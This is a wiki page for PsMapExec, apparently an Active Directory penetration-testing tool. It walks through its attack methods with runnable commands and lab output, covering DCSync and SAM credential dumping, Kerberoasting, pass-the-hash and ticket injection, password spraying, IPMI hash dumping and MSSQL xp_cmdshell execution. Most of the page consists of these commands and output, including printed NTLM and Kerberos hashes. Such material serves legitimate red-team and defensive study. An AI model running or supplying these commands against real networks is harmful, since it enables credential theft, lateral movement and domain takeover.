Skip to content

01 ‐ Methods

Jump to bottom
The-Viper-One edited this page Jun 4, 2025 · 15 revisions

Overview

In the context of PsMapExec, methods refer to the various built-in functions that enable interaction with systems over specific protocols. Each method defines how PsMapExec performs a task — for instance, the SMB and WMI methods facilitate access checks and remote code execution using their respective protocols. The Spray method tells PsMapExec to conduct a credential spraying operation with the supplied arguments, while the LDAP method directs it to connect to a target LDAP server. PsMapExec supports a range of methods, each tailored for different types of operations. Refer to the table of contents below for details on how to use each one effectively.

🔗 Table of Contents

 

 

> Command Execution Methods

The following methods support command execution and running modules on target systems:

  • MSSQL
  • SMB
  • SessionHunter
  • WinRM
  • WMI

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec [Method] -Targets All

# With Password
PsMapExec [Method] -Targets All -Username [Username] -Password [Password]

# With Hash
PsMapExec [Method] -Targets All -Username [Username] -Hash [NTLM/RC4/AES256]

# With Ticket
PsMapExec [Method] -Targets All -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI and MSSQL only) (Password auth only)
PsMapExec WMI -Targets All -Username Administrator -Password Password -LocalAuth

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to the above Authentication Types to execute given commands as a specified or current user.

PsMapExec [Method] -Targets All -Command "whoami"
PS > PsMapExec wmi -Targets All -Command "whoami"

WMI   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [+] SUCCESS
security\moe

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
security\moe

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to the Authentication Types to execute given modules as a specified or current user.

# Syntax example
PsMapExec [Method] -Targets All -Module [Module]
PS C:\Users\moe> PsMapExec smb -Targets "MSSQL*" -Module sam -ShowOutput

SMB   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

SMB   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

 

 

> DCSync

Performs DCSync against specified Domain Controller(s). Output is stored in $pwd\PME\DCSync\DCSync_Full_Dump unless a specific user is targeted in which case data is stored in $pwd\PME\DCSync\DCSync_User_Dump

Primary Purpose: Remote DCSyncing and domain password analysis.

Usage

# Target a specific DC
PsMapExec dcsync -Targets DC01.security.local -ShowOutput

# Target all DCs (Syncs all accounts, on all DCs)(Should probably disallow this)
PsMapExec dcsync -Targets DCs -ShowOutput

 

Example Output

PS > PsMapExec dcsync -Targets DC01.security.local -ShowOutput

DCSync   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

SECURITY-CA$::aad3b435b51404eeaad3b435b51404ee:6e0028f4965e20e922fde677e40f9831:::
krbtgt::aad3b435b51404eeaad3b435b51404ee:bca1f3ee9cb3b27da08a2d754fffff7d:::
WS-APPLOCKER$::aad3b435b51404eeaad3b435b51404ee:8d827964afd7526ebd1c9fddbd85f899:::
MSSQL02$::aad3b435b51404eeaad3b435b51404ee:b58cff1e40f33c061af24cd485a07f33:::
WS07$::aad3b435b51404eeaad3b435b51404ee:7ed1fcc31ab5610452604c4644b3c7e0:::
SRV2012$::aad3b435b51404eeaad3b435b51404ee:d167e284b82d44414b3eb49cab3c98db:::
Administrator::aad3b435b51404eeaad3b435b51404ee:602f5c34346bc946f9ac2c0922cd9ef6:::

Parsing Results

[*] Parsed NTDS files stored in C:\Users\moe\PME\DCSync\DCSync_Full_Dump

It is also possible to only sync a single user. It is highly recommended to ensure when doing so, to append the domain netbios name to the username.

PsMapExec dcsync -Targets DC01.security.local -option "dcsync:security\krbtgt" -ShowOutput

 

Example Output (Single User)

PS > PsMapExec dcsync -Targets DC01.security.local -option "dcsync:security\krbtgt" -ShowOutput

DCSync   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

< -- Snip -->

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 17/05/2025 11:36:26
Object Security ID   : S-1-5-21-1201573619-2117991115-2379797238-502
Object Relative ID   : 502

Credentials:
  Hash NtLm: bca1f3ee9cb3b27da08a2d754fffff7d
    ntlm- 0: bca1f3ee9cb3b27da08a2d754fffff7d
    lm  - 0: 327d0b3e9bd74fc308bef6164bd10393

< -- Snip -->

 

 

> GenRelayList / SMB Signing

PsMapExec supports SMB signing checks to determine which specified targets have signing enabled.

Output for systems which do not require SMB signing will be stored in $pwd\PME\SMB\SigningNotRequired.txt

Primary Purpose: Identification of systems for SMB signing status.

Usage

PsMapExec GenRelayList -Targets All

By default, the results are parsed and a list of hostnames are written to disk in the PME folder for all hosts which do not require signing.

Example Output

PS > PsMapExec GenRelayList -Targets All -Domain Security.local

GenRelayList   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [-] SMB Signing Required
GenRelayList   10.10.10.100    DC01.security.local           Windows Server 2022 Standard      [-] SMB Signing Required
GenRelayList   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SMB Signing not Required
GenRelayList   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SMB Signing not Required
GenRelayList   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [+] SMB Signing not Required
GenRelayList   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [-] SMB Signing Required

Success Count    : 3
Script Completed : 08:18:34
Elapsed Time     : 00:00:01.2651776

 

 

> Inject

A simple method, Inject is used to inject a kerberos ticket in memory. There are two primary reasons for performing this method:

  • You do not have any kerberos tickets already in memory, for example when working from a non-domain joined system
  • You wish to revert to different "credentials" after performing impersonation in PsMapExec

Primary Purpose: Changing current user context with various credential material (Rubeus ptt)

Usage

Ticket

A base64 encoded Kerberos ticket can be supplied to the -Ticket parameter either directly into the console or can be loaded from file.

PsMapExec Inject -Ticket "doIhsj..."
PsMapExec Inject -Ticket "C:\ticket.txt"

Username and Hash

A username and hash combination can also be provided for authentication. The following hashes are currently accepted:

  • RC4 / NT
  • NTLM
  • AES256 HMAC 
PsMapExec Inject -Username [User] -Hash [Hash] -Domain [Domain]

Username and Password

Traditional username and password combination is also supported.

PsMapExec Inject -Username [User] -Password [Password] -Domain [Domain]

Example Output

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Moe @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:20:30 (local)
	End Time:   5/23/2025 18:20:30 (local)
	Renew Time: 5/30/2025 8:20:30 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 


PS C:\Users\moe> PsMapExec inject -Username administrator -Password Password123!!

[+] Ticket Successfuly Injected

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Administrator @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:21:08 (local)
	End Time:   5/23/2025 18:21:08 (local)
	Renew Time: 5/30/2025 8:21:08 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called:

 

 

> IPMI

This method will attempt to dump hashes for vulnerable IPMI servers. By default, a built in user list is used unless otherwise specified in which case a user list can be queried from the domain or a single username can be tried against the IPMI server.

Successful hash output is written to $PWD\PME\IPMI

Primary Purpose: IPMI hash dumping.

Usage

Standard targeting using the built in user list

PsMapExec IPMI -Targets [Targets]

Using a list of domain users as a user list, targeting all domain joined systems

PsMapExec IPMI -Targets All -Option IPMI:DomainUsers

Using a single username for authentication

PsMapExec IPMI -Targets All -Option IPMI:admin

 

 

> Kerberoast

This method will connect targeted domain and perform kerberoasting on eligible accounts. This method also supprots targeted, single user roasting where required. Depending on the encryption type retrieved, PsMapExec will store collected hashes in two seperate files in a hashcat format ready for password cracking.

Primary Purpose: Kerberoasting

Output is stored in: $PWD\PME\Kerberoast

Optional Parameters

Parameter Value Description
-Domain Domain Set the Domain for which to run against
-Option Kerberoast:USER Specify a single user to roast rather than all candidate users
-ShowOutput N/A Displays hash output to the console

 

Obtain all Kerberoastable users from target domain

PsMapExec kerberoast -Domain dev.security.local -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -ShowOutput

[*] Found 2 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
EE167259FF905A8292B30C12904BE9DB07E3E43192662A141010E02CD4A5468C957E7C60617D8CD7B33059718E7204F2186504EB3D604AF95A613E80

< -- Snip -->

User          : dev_user_2
SPN           : cifs/9Dl1TKMroOy2EtLN.domain.com

$krb5tgs$23$*dev_user_2$dev.security.local$cifs/9Dl1TKMroOy2EtLN.domain.com*$265787A4D7A2BBCF9D56D378501C5458$515A080C96
3FCCCBE5DC5F5DAEB9A92BE35E55BFF9DFE9F594C5DF2053350A393E7D2FCA3A3F1AADBBCB0A9A0B10C2C15ABAD9A3BE55FD7E128C2E6B5E883ED9C9
5CF0D68B4E2C24D84DCF61117E80611E3D85FBD63B95E013EEF03F8D4220E28A3497613AE4ABFC81AB5BEF6BD42E18DC4295BA37B231DCAC2989BD6F

< -- Snip -->

Single user specification

PsMapExec Kerberoast -Option "Kerberoast:USER" -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -Option "Kerberoast:dev_user_1" -ShowOutput

[*] Found 1 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
8E405CEFCB72F37A4B3BCF5070F651A9E0F036EFC90C710082F655B826C69DAD6B6CD03E9CE580799162A13DE60346A3158241225705F9C34B7158F4

< -- Snip -->

 

 

> LDAP / LDAPS

This method is used for performing authentication to LDAP servers. Refer to the Modules page for in depth usage on what can be executed on LDAP servers.

Primary Purpose: Authentication and LDAP based abuse vectors.

Usage

Note: Use "LDAP" for the mthod name when uncencrypted LDAP connections to port 389 are required. Otherwise it is recommended to use "LDAPS" to connect to port 636 for encrypted communications.

Simply check current user authentication to LDAP

# Check authentication with current user credentials
PsMapExec LDAP -Targets DC01

# Execute modules as current user
PsMapExec LDAP -Targets DC01 -Module [Module]

# Check authentication with alternate credentials
PsMapExec LDAP -Targets DC01 -Username Moe -Password Password123

# Check authentication with alternate hash
PsMapExec LDAP -Targets DC01 -Username Moe -Hash 602F5C34346BC946F9AC2C0922CD9EF6

# Check authentication with alternate credentials (ticket) against all Domain Controllers over LDAPS
PsMapExec LDAPS -Targets DCs -Ticket doIF+DCCBfSgAwIBBaEDA...

 

 

> MSSQL

The MSSQL method will identify MSSQL servers within the targeted domain and attempt to authenticate to each instance, either as the current user context or with provided local authentication credentials. Command execution is supported.

Primary Purpose: Command execution and access checking on MSSQL servers.

Usage

Authentication Types

The MSSQL module supports the following authentication types

# Current user
PsMapExec MSSQL -Targets All

# Local Authentication (Authenticates through SQL Server login)
PsMapExec MSSQL -Targets All -Username SA -Password Password123 -LocalAuth

Status messages

Status messages are returned to the console to indicate what level of access we may have to a specified instance.

[+] ACCESSIBLE INSTANCE # The instance is accessible, without sysadmin rights
[-] ACCESS DENIED       # Access is denied to the instance
[+] SYSADMIN            # You are a sysadmin on the instance, try executing commands

Command Execution

If you have sysadmin rights you can supply the -Command parameter to PsMapExec. xp_cmdshell needs to be enabled to perform command execution, if it is not, PsMapExec will attempt to enable it and, after doing so will revert xp_cmdshell to its original state.

PsMapExec MSSQL -Targets All -Command "whoami"

 

 

> Session Hunter

PsMapExec supports Leo4j's Invoke-SessionHunter. The SessionHunter method identifies systems with privileged or administrative user sessions, checks whether the current or provided user credentials have administrative access, and, if so, continues with command execution.

This is an ideal method through which to filter target acquisition to isolate only the most pertinent targets.

Primary Purpose: Command execution on systems that are likely to contain sensitive account credentials

Usage

# Without command execution (Check Access)
PsMapExec SessionHunter -Targets [Targets]

# With command execution
PsMapExec SessionHunter -Targets [Targets] -Command "whoami"

# With modules
PsMapExec SessionHunter -Targets [Targets] -Module [Module]

 

 

> Spray

The spray method offers various credential spraying techniques. PsMapExec is designed to respect the domain's default account lockout threshold, helping to prevent user lockouts. However, it does not account for fine-grained password policies (FGPPs). It’s recommended to verify whether FGPPs are in use within the environment, as they could lead to unintended account lockouts during spraying.

Primary Purpose: Account validation through credential spraying

Usage

Targets

When using the Spray method, the -Targets parameter is used to specify which accounts to perform password spraying on. if -Targets is not specified all enabled user accounts for the targeted or current domain will be sprayed against.

Other values for -Targets are supported; as shown below:

PsMapExec Spray -Domain Security.local                           # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "All"            # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "C:\Users.txt"   # Sprays users from list (SamAccountNames)
PsMapExec Spray -Domain Security.local -Targets "AdminCount=1"   # Sprays targets which have the attribute AdminCount=1
PsMapExec Spray -Domain Security.local -Targets "Group Name"     # Sprays members of group

Hash

Hash authentication supports NT, LM:NT and AES256 hashes

PsMapExec Spray -SprayHash [RC4]
PsMapExec Spray -SprayHash [AES256]
PsMapExec Spray -SprayHash [LM:NT]

Password

PsMapExec Spray -SprayPassword [Password]

AccountAsPassword

Sets the password to the username value.

PsMapExec Spray -AccountAsPassword

EmptyPassword

Authentication attempts are performed with empty password values.

PsMapExec Spray -EmptyPassword

Pre2k

Sprays for Pre2k computer accounts.

PsMapExec Spray -Pre2k

SuccessOnly

Displays only successful authentication attempts. This is recommended in large domains as a large number of console writes hinders the speed PowerShell significantly.

PsMapExec Spray -SprayPassword [Password] -SuccessOnly

Example Output

PS > PsMapExec spray -domain security.local -SprayPassword Password123

 - Lockout Threshold  : 20
 - Safety Limit value : 18
 - Removed disabled accounts from spraying

[*] Spraying with password value: Password123

[-] security.local\Administrator
[+] security.local\Moe
[+] security.local\mendez
[+] security.local\yap-yap
[+] security.local\arbiter
[-] security.local\Foehammer
[-] security.local\NobleSix
[+] security.local\Protected


[*] Valid credential pairs 
 
[+] security.local\Moe
[+] security.local\mendez
[+] security.local\yap-yap
[+] security.local\arbiter
[+] security.local\Protected

[*] Output written to C:\Users\moe\PME\Spraying

> VNC

This method simply performs a "no auth" check on any identified VNC servers.

Primary Purpose: Checks for "no auth" on VNC servers

Usage

# Check for VNC no auth on all systems in the domain
PsMapExec VNC -Target all -Domain Security.local

Example Output

PS > PsMapExec vnc -Targets ALL -Domain security.local

VNC   10.10.10.27     MSSQL01.security.local       Windows Server 2022 Standard   [+] AUTH NOT REQUIRED
VNC   10.10.10.32     MSSQL02.security.local       Windows Server 2022 Standard   [-] AUTH REQUIRED

 

 

Clone this wiki locally